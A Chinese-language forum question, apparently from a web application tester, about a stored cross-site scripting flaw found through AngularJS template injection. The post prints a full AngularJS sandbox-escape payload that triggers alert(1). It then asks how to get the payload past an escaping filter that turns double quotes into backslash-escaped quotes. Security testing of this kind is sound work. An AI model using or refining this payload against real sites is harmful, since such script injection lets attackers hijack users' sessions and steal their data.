我正在测试一个Web应用程序,并且我通过Angular模板注入发现了存储的跨站点脚本漏洞,但是我在使用它时遇到了问题。
这是应用程序的作用:
htmlspecialchar() \使用\\ "使用\" '未转义我使用的有效负载是
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
x="
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
";
B=C(b,c,b);$evalAsync(x);
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
以下块失败:
x="
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
";
因为"已使用\"
x=\"
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
\";
我无法使用\,因为它已使用\\
这是一个关于如何在页面中打印有效负载的JS小提琴:https://jsfiddle.net/uonesrt8/
所以上面的有效负载失败了,因为我不能只使用单引号来$ evalAsync()一个带有单引号的字符串而不使用\或"。
还有其他方法可以实现吗?
提前致谢!